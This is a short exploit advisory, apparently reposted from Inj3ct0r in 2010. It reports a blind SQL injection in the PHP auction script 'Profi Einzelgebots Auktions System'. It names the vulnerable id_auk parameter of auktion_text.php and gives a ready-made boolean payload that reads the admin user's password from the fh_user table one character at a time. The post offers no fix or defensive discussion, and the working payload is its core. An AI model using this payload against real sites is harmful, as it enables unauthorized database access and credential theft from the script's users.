Home / os / winme

Profi Einzelgebots Auktions System Blind SQL Injection Vulne

Posted on 01 April 2010

====================================================================
Profi Einzelgebots Auktions System Blind SQL Injection Vulnerability
====================================================================

----------------------------Information------------------------------------------------
+Name : Profi Einzelgebots Auktions System <= Blind SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 01.04.2010
+Script  : Profi Einzelgebots Auktions System
+Price : 399.99?
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion_text.php?id_auk=
 
#password
+Exploitable   : http://www.site.com/auktion/auktion_text.php?id_auk=1+and+1=1+and+
ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
 
 
-----------------------------------------------------------------------------------------


# Inj3ct0r.com [2010-04-01]

 

TOP